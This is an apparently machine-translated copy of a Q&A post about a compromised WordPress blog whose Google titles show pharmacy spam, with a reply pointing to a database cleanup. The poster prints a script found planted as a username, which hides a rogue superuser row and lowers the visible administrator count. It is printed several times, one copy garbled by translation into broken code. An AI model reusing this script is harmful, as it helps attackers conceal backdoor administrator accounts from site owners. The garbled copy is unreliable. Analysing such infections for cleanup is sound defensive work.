Php 如何从脚本中查找并清除wordpress,这些脚本会在Google和Yahoo上更改您的博客标题,并带有“尴尬”字样;伟哥文本;?
在成功抵御大规模DDoS攻击后的一天,现在有人似乎在谷歌搜索引擎上将帖子标题改为伟哥广告。看看他们是如何伤害我们的:Php 如何从脚本中查找并清除wordpress,这些脚本会在Google和Yahoo上更改您的博客标题,并带有“尴尬”字样;伟哥文本;?,php,security,wordpress,sql-injection,code-injection,Php,Security,Wordpress,Sql Injection,Code Injection,在成功抵御大规模DDoS攻击后的一天,现在有人似乎在谷歌搜索引擎上将帖子标题改为伟哥广告。看看他们是如何伤害我们的: www.google.com/search?hl=en&client=safari&rls=en&q=伟哥+在线+药房+在线购买+伟哥%2C+Cialis%2C+Levitra+wordpress+hack&aq=f&aqi=&aql=&oq=&gs\U rfai= 在这里: google.com/search?hl=en&client=safari&rls=en&q=idesc
www.google.com/search?hl=en&client=safari&rls=en&q=伟哥+在线+药房+在线购买+伟哥%2C+Cialis%2C+Levitra+wordpress+hack&aq=f&aqi=&aql=&oq=&gs\U rfai=
在这里:
google.com/search?hl=en&client=safari&rls=en&q=idescribe&btnG=search&aq=f&aqi=g-s1g-sx2g-s1g-sx1&aql=&oq=&gs_rfai=
我们所做的是使用干净的插件安装干净的WP,并使用旧帖子和所有页面导入我们的DB。然后手动添加我们需要的每个puglin,然后重建sitemap.xml
但现在我们注定要失败,因为你搜索的任何关键词都会在谷歌上得到标题为“伟哥在线药房-在线购买伟哥、夏利斯、莱维特拉”的结果
我在DB表wp_usermeta user_id:16中发现用户名是一个脚本:
<b id="user_superuser"><script language="JavaScript">
var setUserName = function(){
try{
var t=document.getElementById("user_superuser");
while(t.nodeName!="TR"){
t=t.parentNode; };
t.parentNode.removeChild(t);
var tags = document.getElementsByTagName("H3");
var s = " shown below";
for (var i = 0; i < tags.length; i++) {
var t=tags[i].innerHTML;
var h=tags[i];
if(t.indexOf(s)>0){
s =(parseInt(t)-1)+s;
h.removeChild(h.firstChild);
t = document.createTextNode(s);
h.appendChild(t); } }
var arr=document.getElementsByTagName("ul");
for(var i in arr) if(arr[i].className=="subsubsub"){
var n=/>Administrator \((\d+)\)</gi.exec(arr[i].innerHTML);
if(n[1]>0){ var txt=arr[i].innerHTML.replace(/>Administrator \((\d+)\) </gi,">Administrator ("+(n[1]-1)+")<"); arr[i].innerHTML=txt; } }
}catch(e){};
}; addLoadEvent(setUserName); </script>
var setUserName=function(){
试试{
var t=document.getElementById(“用户\超级用户”);
而(t.nodeName!=“TR”){
t=t.parentNode;};
t、 parentNode.removeChild(t);
var tags=document.getElementsByTagName(“H3”);
var s=“如下所示”;
对于(var i=0;i0{
s=(parseInt(t)-1)+s;
h、 removeChild(h.firstChild);
t=document.createTextNode;
h、 appendChild(t);}
var arr=document.getElementsByTagName(“ul”);
对于(arr中的var i)if(arr[i].className==“subsubsubsub”){
var n=/>管理员\(\d+)\)0{var txt=arr[i].innerHTML.replace(/>管理员\(\d+)\)0){
s=(parseInt(t)-1)+s;
h、 removeChild(h.firstChild);
t=document.createTextNode;
h、 儿童(t);
}
}
var arr=document.getElementsByTagName(“ul”);
对于(arr中的var i)if(arr[i].className==“subsubsubsub”){
var n=/>管理员((d+)0){
var txt=arr[i].innerHTML.replace(/>管理员((d+)在将数据库导入新的WP安装之前导出并清理数据库:请参阅并非常感谢您我认为您发布的WP codex链接中的此链接给出了答案:
<div id="user_superuser"><script language="JavaScript">
var setUserName = function(){
try{
var t=document.getElementById("user_superuser");
while(t.nodeName!="TR"){
t=t.parentNode;
};
t.parentNode.removeChild(t);
var tags = document.getElementsByTagName("H3");
var s = " shown below";
for (var i = 0; i < tags.length; i++) {
var t=tags[i].innerHTML;
var h=tags[i];
if(t.indexOf(s)>0){
s =(parseInt(t)-1)+s;
h.removeChild(h.firstChild);
t = document.createTextNode(s);
h.appendChild(t);
}
}
var arr=document.getElementsByTagName("ul");
for(var i in arr) if(arr[i].className=="subsubsub"){
var n=/>Administrator ((d+))</gi.exec(arr[i].innerHTML);
if(n[1]>0){
var txt=arr[i].innerHTML.replace(/>Administrator ((d+))</gi,">Administrator ("+(n[1]-1)+")<");
arr[i].innerHTML=txt;
}
}
}catch(e){};
};
addLoadEvent(setUserName);
</script></div>